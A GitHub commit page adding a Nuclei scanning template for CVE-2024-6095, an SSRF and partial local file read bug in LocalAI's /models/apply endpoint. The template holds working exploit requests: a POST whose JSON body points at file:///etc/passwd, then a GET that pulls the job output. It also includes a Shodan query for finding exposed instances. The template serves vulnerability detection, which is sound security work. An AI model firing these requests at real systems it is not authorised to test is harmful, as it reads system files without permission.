-
Notifications
You must be signed in to change notification settings - Fork 2.6k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #10593 from projectdiscovery/CVE-2024-6095
Create CVE-2024-6095.yaml
- Loading branch information
Showing
1 changed file
with
67 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,67 @@ | ||
id: CVE-2024-6095 | ||
|
||
info: | ||
name: LocalAI - Partial Local File Read | ||
author: iamnoooob,pdresearch,rootxharsh | ||
severity: medium | ||
description: | | ||
A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s)-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. | ||
reference: | ||
- https://github.com/fkie-cad/nvd-json-data-feeds | ||
- https://github.com/sev-hack/sev-hack | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-6095 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N | ||
cvss-score: 5.8 | ||
cve-id: CVE-2024-6095 | ||
cwe-id: CWE-918 | ||
epss-score: 0.00046 | ||
epss-percentile: 0.17714 | ||
cpe: cpe:2.3:a:mudler:localai:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 2 | ||
vendor: mudler | ||
product: localai | ||
shodan-query: http.favicon.hash:-976853304 | ||
tags: cve,cve2024,localai,mudler,lfi | ||
|
||
flow: http(1) && http(2) | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /models/apply HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/json | ||
{"url":"file:///etc/passwd"} | ||
extractors: | ||
- type: json | ||
part: body | ||
name: uuid | ||
internal: true | ||
json: | ||
- ".uuid" | ||
|
||
- raw: | ||
- | | ||
GET /models/jobs/{{uuid}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- ': cannot unmarshal !!str `root:x:...`' | ||
|
||
- type: word | ||
part: content_type | ||
words: | ||
- 'application/json' | ||
|
||
- type: status | ||
status: | ||
- 200 |